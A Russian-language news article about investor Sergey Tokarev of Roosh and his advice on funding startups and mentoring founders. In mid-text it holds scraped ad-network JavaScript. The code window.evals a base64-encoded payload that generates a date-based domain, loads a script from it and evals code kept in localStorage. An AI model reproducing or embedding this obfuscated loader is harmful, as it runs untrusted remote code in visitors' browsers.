Сергей Токарев из Roosh: IT-стартапы нуждаются в наставниках в лице инвесторов

Глава Roosh Сергей Токарев о правилах успешного инвестирования в молодые проекты

Рынок информационных технологий переживает активный рост и насыщается новыми проектами, за счёт которых создаётся конкуренция внутри разных сегментов сферы. В то же время стратапы, которые пытаются запуститься в новой нише, не застрахованы от неудач — ведь всегда есть вероятность, что идея не «выстрелит» и принесёт убытки основателям.

В столь неопределённых и непростых условиях инвесторам важно научиться грамотно оценивать перспективы бизнеса, в который они планируют вложить средства. О том, как это сделать, рассказал основатель IT-компании Roosh Сергей Токарев на Cyprus IT Forum.

Успешные кейсы

За плечами Сергея Токарева более десяти лет работы на инвестиционном рынке. За это время он профинансировал свыше ста молодых проектов. В их числе оказались мобильное приложение Reface, разработчики фитнес-трекера Oura Ring, студия 3D-рендеринга ZebraAI, платформа Facemoji для создания виртуальных аватаров.

Совсем недавно предприниматель вложил средства в Playco, компанию-разработчика игр для мессенджеров и соцсетей типа Viber, Telegram, TikTok, Messenger. Особенность этого стартапа в том, что он работает в сегменте no-code — то есть создает приложения без программирования. По словам предпринимателя, это относительно новая и трендовая ниша в сфере IT, активно привлекающая финансирование.

Правила успешного финансирования

Инвестирование — интересная, но в то же время рискованная деятельность, и неудачи в нём не такая уж и редкость, признаётся Сергей Токарев. Он и сам неоднократно вкладывался в проекты, которые в конечном счёте не смогли окупиться. Однако в этом, по его мнению, нет ничего страшного, поскольку неудачный опыт — тоже опыт, который можно обернуть себе на пользу. Предприниматель убеждён, что провалы необходимо рассматривать как полезные уроки, благодаря которым новые проблемы будут решаться в разы эффективнее.

Одним из таких уроков для инвесторов может стать умение принимать в расчёт человеческий фактор. Важно понять, какие цели преследуют основатели проекта в долгосрочной перспективе. По-настоящему успешным бизнес становится лишь на шестом-восьмом году жизни, считает глава Roosh, и всё это время фаундеры должны усердно и кропотливо работать над делом. Если же они хотят быстренько открыться и пустить всё на самотёк — для вкладчика это повод отказаться от идеи.

Другой важный навык — видение проблематики проекта. Продукт должен быть понятным, полезным и решать конкретные задачи. Только так он найдёт отклик у потребителя. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Далее идёт аналитика. В запуске стартапа важна не только его техническая часть, но и маркетинговая. Для этого нужны надёжные люди, которые займутся продвижением: СТО, продакт-менеджер, маркетологи.

Вместе с тем над проектом должна работать команда по управлению рисками. Необходимо регулярно отслеживать тенденции рынка, оценивать деятельность конкурентов и динамику их роста. Если их показатели падают — следует выяснить почему, чтобы устранить схожие проблемы в своём бизнесе. Таким образом, формируется целая база знаний, которая помогает развивать стартап на всех его этапах: и до, и после финансирования.

Роль наставника

За многие годы работы в роли инвестора Сергей Токарев вынес один из важнейших уроков: успешность молодого бизнеса во многом зависит от того, насколько в нём заинтересованы сами инвесторы.

В качестве примера основатель Roosh привёл свой опыт работы с портфельной компанией Reface. Он не принимал участие в создании проекта, однако работал над его развитием наравне с фаундерами: искал варианты его продвижения, нужные связи, надёжных специалистов в команду.

«Фаундерам нужна помощь, а не дополнительное давление сверху», — делает выводы Сергей Токарев. Венчурные инвесторы должны давать стартаперам не только финансовую, но и экспертную поддержку, быть для них наставниками, эдвайзерами. Он уверен, что именно с таким подходом инвесторы могут рассчитывать на реальный успех. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/sergej-tokarev-iz-roosh-it-startapy-nuzhdayutsya-v-nastavnikah-v-litse-investorov/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top